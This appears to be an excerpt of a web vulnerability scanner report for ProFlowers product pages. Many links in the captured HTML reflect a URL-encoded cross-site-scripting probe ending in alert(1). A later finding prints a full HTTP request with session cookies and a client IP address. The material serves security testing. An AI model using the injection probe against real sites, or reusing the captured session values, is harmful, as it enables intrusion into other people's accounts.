<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6insucculent_zinc09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/zinc08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30008396" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
owers/Mardi-Gras-Orchid-Garden-42864?viewpos=1&amp;trackingpgroup=YMA&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
hers-Day-Bouquet-30050137?viewpos=1&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
eed to last at least 7 days." border="0" href="http://www.proflowers.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." style="border-width:0px;" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." style="border-width:0px;" /></a>
...[SNIP]...
" border="0" rel="nofollow" href="http://www.proflowers.com/international?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" style="border-width:0px;" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." style="border-width:0px;" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." style="border-width:0px;" /></a> <a title="Unique personalized gifts for life...s special occasions." border="0" href="http://www.personalcreations.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." style="border-width:0px;" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

3.3. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including The Ultimate Office Plant from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
